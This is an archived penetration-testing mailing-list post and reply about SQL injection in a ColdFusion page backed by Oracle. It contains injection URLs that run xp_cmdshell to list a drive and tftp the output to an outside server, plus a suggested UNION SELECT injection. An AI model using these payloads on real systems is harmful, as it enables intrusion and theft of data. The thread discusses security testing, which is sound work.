Penetration Testing mailing list archives
Re: CFM SQL injection
From: "Charlie Liserne" <Chili () SexMagnet com>
Date: Mon, 24 Dec 2001 20:13:57 +0100
Hi, I'm trying to get the C:/ directory, but I'm not able to do that. This is a non-intrusive pen-test, so I wouldn't like to have to exec something like:

http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'dir *.* > c:\listing.txt' --'
http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'tftp listing.txt my.server' --'

I would like to get a listing of the c: directory in a clean way, without writing to disk, and get the results appearing in my web browser. I know some column names, but I can't figure out how it could be possible to read or modify them. Also, I'm not able to get a list of the directory. The ' escape character isn't necessary, but when I do:

http://www.server.es/page.cfm?page_id=12; EXEC master..xp_cmdshell 'dir';

The response is:

ODBC Error Code = S1000 (General error) [Oracle][ODBC][Ora]ORA-00911: invalid character

Where is the invalid character?? How could it be possible to take advantage of a ColdFusion programming error? Some time ago, in this mailing list, there appeared a message from Rick Redman (Minga), speaking about how easy it is to break into a ColdFusion app if the programmer isn't 100% trained in secure coding practices. I was searching the Internet about this, and how to take advantage of the programming errors, but I can't figure out how to pervert a cfm application. Do you know if there is any document about this?

Best Regards,
Charlie.

*********** REPLY SEPARATOR ***********
It looks like the query that you're attacking isn't prepending and appending quotes to your input. The string build probably looks a lil' sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID

This means that there is no need to use quotes in order to perform a successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1

Hopefully this will return an error complaining about an invalid table name, or at least another error that may give you a better idea of what the web application is doing with your argument.
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- SQL INJECTION - ORACLE foo bar (Dec 10)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: CFM SQL injection Kevin Spett (Dec 19)
- Re: CFM SQL injection Charlie Liserne (Dec 24)
- Re: SQL INJECTION - ORACLE Kevin Spett (Dec 10)